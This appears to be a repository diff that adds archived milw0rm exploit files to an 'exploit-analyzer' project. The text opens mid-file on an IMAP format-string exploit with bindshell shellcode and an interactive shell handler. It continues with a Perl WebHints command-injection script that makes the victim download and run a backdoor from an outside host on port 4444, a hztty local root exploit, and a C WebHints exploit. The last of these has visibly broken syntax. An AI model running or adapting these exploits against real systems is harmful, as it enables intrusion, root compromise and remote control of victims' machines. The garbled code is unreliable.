+"\x41"                          //  inc    %ecx
+"\xe2\xf8"                      //  loop  8048469 <blah>
+"\x52"                          //  push  %edx
+"\x68\x6e\x2f\x73\x68"    //  push  $0x68732f6e
+"\x68\x2f\x2f\x62\x69"    //  push  $0x69622f2f
+"\x89\xe3"                //  mov    %esp,%ebx
+"\x52"                    //  push  %edx
+"\x53"                    //  push  %ebx
+"\x89\xe1"                //  mov    %esp,%ecx
+"\xb0\x0b"                //  mov    $0xb,%al
+"\xcd\x80"                //  int    $0x80
+;
+/********************************\
+|****** handle remoteshell ******|
+\********************************/
+int handleshell(int peersh)
+{
+fd_set fds;
+char buff[2048];
+int ret, cntr = 1;
+printf(" |- enjoy your stay and come back soon ;>\n");
+write(peersh, "unset HISTFILE;id;uname -a;\n", 30);
+while(ret && cntr)
+     {
+      FD_ZERO(&fds);
+      FD_SET(0, &fds);
+      FD_SET(peersh, &fds);
+      ret = select(peersh+1, &fds, 0, 0, 0);
+      if(ret)
+        {
+         memset(buff, 0x0, sizeof(buff));
+         if(FD_ISSET(peersh, &fds))
+           {
+            cntr = read(peersh, buff, sizeof(buff)-1);
+            printf("%s", buff);
+            fflush(stdout);
+            }
+         if(FD_ISSET(0, &fds))
+           {
+            cntr = read(0, buff, sizeof(buff)-1);
+            write(peersh, buff, strlen(buff));
+           }
+        }
+     }
+ return 1;
+}
+/********************************\
+|********* HELP OUTPUT **********|
+\********************************/
+void help()
+{
+printf(" `- usage: gun-imapd -p 143 -t www.exploits.cx  \n");
+exit(0);
+}
+/********************************\
+|******* CONNECT FUNC  **********|
+\********************************/
+int connectme(char* ip, unsigned short port)
+{
+int soquet;
+struct sockaddr_in  remoteaddr_in;
+struct hostent*     hostip;
+memset(&remoteaddr_in, 0x0, sizeof(remoteaddr_in));
+if ((hostip = gethostbyname(ip)) == NULL)
+   {
+     printf(" |- could not resolve [%s]\n", ip);
+     exit(-1);
+   }
+remoteaddr_in.sin_family = AF_INET;
+remoteaddr_in.sin_port   = htons(port);
+remoteaddr_in.sin_addr   = *((struct in_addr *)hostip->h_addr);
+if ((soquet = socket(AF_INET, SOCK_STREAM, 0)) < 0)
+    {
+     printf(" |- got no socket!\n");
+     exit(-1);
+    }
+printf(" |- try connecting to [%s:%d] ...", ip, port);
+if (connect(soquet, (struct sockaddr *)&remoteaddr_in, sizeof(struct sockaddr)) ==  -1)
+   {
+    printf(" no connection, exiting!\n");
+    exit(-1);
+   }
+printf(" successfull!\n");
+return(soquet);
+}
+/********************************\
+|********* DO SPLOIT ************|
+\********************************/
+int do_sploit(int soquet)
+{
+char buff[1024], *addr = 0;
+int cntr = 0, *ptr, scaddr, gotaddr = GOT;
+unsigned int w1, w2 ,w3;
+//find heap with our shellcode: !experimental!
+memset(buff, 0x00, sizeof(buff));
+memset(buff, 0x41, 496);
+strcat(buff, "111122223333%p%p%p%p[%p-%p]\r\n");
+if(write(soquet, buff, strlen(buff)) == -1)
+  {
+   printf(" |- could not send packet!\n");
+   return -1;
+  }
+memset(buff, 0x00, sizeof(buff));
+read(soquet, buff, sizeof(buff)-1);
+addr = strstr(buff, "[");
+if(addr > 0)
+  {
+   scaddr = strtoul(++addr, 0, 0) + 0x330;//the next chunk..
+   printf(" |- using %p\n", scaddr);
+     }
+else printf(" |- !could not determine heap address..\n!");
+//k build exploit now:
+ w3 = ( scaddr & 0xffff0000 ) >> 16;
+ w1 = ( scaddr & 0x0000ffff );
+memset(buff, 0x00, sizeof(buff));
+memset(buff, 0x41, 496);
+memcpy(buff+400, bindshell, strlen(bindshell));
+cntr = strlen(buff) + 3*4;
+ptr = (int *)gotaddr;
+memcpy((buff+496), &ptr,4);
+ptr = (int *)gotaddr;
+memcpy((buff+500), &ptr,4);
+ptr = (int *)(gotaddr+2);
+memcpy((buff+504), &ptr,4);
+w1 -= cntr;
+w3 += (0x10000 - w1) - cntr;
+sprintf(buff+508, "%%%dp%%n%%%dp%%n \r\n", w1, w3);
+if(write(soquet, buff, strlen(buff)) == -1)
+  {
+   printf(" |- could not send packet!\n");
+   return -1;
+  }
+//memset(buff, 0x00, sizeof(buff));
+//read(soquet, buff, sizeof(buff));
+return 1;
+}
+/********************************\
+|************* MAIN *************|
+\********************************/
+int main(int argc, char *argv[])
+{
+int tmp, socke, port = 143;
+char *target = 0;
+char banner[32];
+printf(" . gun-imapd v0.1 by qobaiashi\n |\n");
+memset(banner, 0x00, sizeof(banner));
+while((tmp = getopt(argc, argv, "p:t:h")) != EOF)
+     {
+      switch (tmp)
+             {
+              case 'p':
+                         port = atoi(optarg);
+                         printf(" |- using port: %d\n", port);
+                         break;
+              case 't':
+                         target = optarg;
+                         printf(" |- target host is: %s\n", optarg);
+                         break;
+              case 'h':  help();
+              }
+      }
+if (target == NULL) help();
+socke = connectme(target, port);
+if (read(socke, banner, sizeof(banner)) > -1)
+   {
+    printf(" |- remote host is a %s", (banner+4));
+   }
+do_sploit(socke);
+sleep(1);
+tmp = connectme(target, 4096);
+handleshell(tmp);
+close(tmp);
+close(socke);
+}
+// milw0rm.com [2005-06-10]

exploit-analyzer/exploits/exploit_1039.txt ADDED Viewed

	@@ -0,0 +1,72 @@

+# This exploit uses a backdoor that isn't located on this server.
+# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
+# change for your own needs. /str0ke
+#!/usr/bin/perl
+######################################################################################
+#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #
+######################################################################################
+#  EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln                               #
+#                                                                                    #
+#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #
+#Email: Alpha_Programmer@Yahoo.Com                                                   #
+#                                                                                    #
+#This Xpl Run a backdo0r in Server With 4444 Port.                                   #
+#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded               #
+######################################################################################
+# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  The-CephaleX  -- Str0ke         #
+#And Iranian Security & Technical Sites:                                             #
+#                                                                                    #
+#         TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG             #
+#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  GrayHatz.NeT      #
+######################################################################################
+use IO::Socket;
+if (@ARGV < 2)
+{
+ print "\n==============================================\n";
+ print " \n    WebHints Exploit By Alpha_Programmer \n\n";
+ print "      Trap-Set Underground Hacking Team      \n\n";
+ print "            Usage: <T4rg3t> <Dir>      \n\n";
+ print "==============================================\n\n";
+ print "Examples:\n\n";
+ print "    Webhints.pl www.Host.com /cgi-bin/ \n";
+ exit();
+}
+$serv = $ARGV[0];
+$serv =~ s/http:\/\///ge;
+$dir = $ARGV[1];
+$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
+$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl";
+$req = "GET $dir";
+$req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n";
+$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";
+print $sock $req;
+print "\nPlease Wait ...\n\n";
+sleep(3000);
+close($sock);
+$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";
+$req2 = "GET $dir";
+$req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n";
+print $sock2 $req2;
+sleep(100);
+print "\n\n$$$   OK -- Now Try: Nc -v www.Site.com 4444   $$$\n";
+print "$$  if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP  $$\n";
+print "Enjoy ;)";
+### EOF ###
+# milw0rm.com [2005-06-11]

exploit-analyzer/exploits/exploit_104.txt ADDED Viewed

	@@ -0,0 +1,60 @@

+/*  0x333hztty => hztty 2.0 local root exploit
+ *
+ *
+ *	more info : Debian Security Advisory DSA 385-1
+ *
+ *	*note* I adjusted some part of hztty's code since
+ *	there were some errors. hope this will not influence
+ *	exploitation :> tested against Red Hat 9.0 :
+ *
+ * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
+ * [c0wboy@0x333 c0wboy]$ ./k
+ *
+ *  ---  local root exploit for hztty 2.0  ---
+ *  ---  coded by c0wboy ~ 0x33  ---
+ *
+ * sh-2.05b# [./hztty started]  [using /dev/ttyp6]
+ * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
+ * sh-2.05b#
+ *
+ *  coded by c0wboy
+ *
+ *  (c) 0x333 Outsiders Security Labs
+ *
+ */
+#include <stdio.h>
+#include <unistd.h>
+#define BIN    "./hztty"
+#define SIZE   272
+unsigned char shellcode[] =
+	"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
+	"\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
+	"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
+	"\xd2\xb0\x0b\xcd\x80" ;
+int main()
+{
+	int i;
+	char out[SIZE];
+	char *own[] = { shellcode, 0x0 };
+	int *hztty = (int *)(out);
+	int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);
+	for (i=0 ; i<SIZE-1 ; i+=4)
+		*hztty++ = ret;
+	hztty = 0x0;
+	fprintf (stdout, "\n ---  local root exploit for hztty 2.0  ---\n");
+	fprintf (stdout, " ---  coded by c0wboy ~ www.0x333.org   ---\n\n");
+	execle (BIN, BIN, "-I", out, 0x0, own, 0x0);
+}
+// milw0rm.com [2003-09-21]

exploit-analyzer/exploits/exploit_1040.txt ADDED Viewed

	@@ -0,0 +1,91 @@

+/*
+**************************************************************************************
+*        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           *
+**************************************************************************************
+ EXPLOIT FOR :  WebHints Remote C0mmand Execution Vuln
+Coded By: A l p h a _ P r o g r a m m e r  (Sirus-v)
+E-Mail: Alpha_Programmer@Yahoo.Com
+This Xpl Upload a Page in Vulnerable Directory , You can Change This Code For Yourself
+**************************************************************************************
+* GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  The-CephaleX  -- Str0ke         *
+*And Iranian Security & Technical Sites:                                             *
+*                                                                                    *
+*         TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG             *
+*      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  GrayHatz.NeT      *
+**************************************************************************************
+*/
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#pragma comment(lib, "ws2_32.lib")
+#include <winsock2.h>
+#define MY_PORT 80
+#define BUF_LEN 256
+/**************************************************************************************/
+int main(int arg_c, char *arg_v[])
+{
+       static const char cmd[] = "GET %chints.pl?|wget %c| HTTP/1.0\r\n\r\n" , arg_v[2] , arg_v[3];
+       struct sockaddr_in their_adr;
+       char buf[BUF_LEN];
+       struct hostent *he;
+       int sock, i;
+       WSADATA wsdata;
+/* Winsock start up */
+       WSAStartup(0x0101, &wsdata);
+       atexit((void (*)(void))WSACleanup);
+       if(arg_c != 3)
+       {
+               printf("=========================================================\n");
+               printf("  Webhints Exploit By Alpha_Programmer\n");
+               printf("   Trap-set Underground Hacking Team\n");
+               printf("   Usage : webhints.exe [Targ3t] [DIR] [File Address]\n");
+               printf("=========================================================\n");
+               return 1;
+       }
+/* create socket */
+printf("calling socket()...\n");
+       sock = socket(AF_INET, SOCK_STREAM, 0);
+/* get IP address of other end */
+printf("calling gethostbyname()...\n");
+       he = gethostbyname(arg_v[1]);
+       if(he == NULL)
+       {
+               printf("can't get IP address of host '%s'\n", arg_v[1]);
+               return 1;
+       }
+       memset(&their_adr, 0, sizeof(their_adr));
+       their_adr.sin_family = AF_INET;
+       memcpy(&their_adr.sin_addr, he->h_addr, he->h_length);
+       their_adr.sin_port = htons(MY_PORT);
+/* connect */
+printf("C0nnecting...\n");
+       i = connect(sock, (struct sockaddr *)&their_adr, sizeof(their_adr));
+       if(i != 0)
+       {
+               printf("C0nnect() returned %d, errno=%d\n", i, errno);
+               return 1;
+       }
+/* send H3ll C0mmand */
+printf("Sending H3ll Packets...\n");
+       i = send(sock, cmd, sizeof(cmd), 0);
+       if(i != sizeof(cmd))
+       {
+               printf("Send. returned %d, errno=%d\n", i, errno);
+               return 1;
+       }\n
+               printf("OK ... Now You Can Test your file in hints.pl Directory\n"):
+       closesocket(sock);
+       return 0;
+}
+// milw0rm.com [2005-06-11]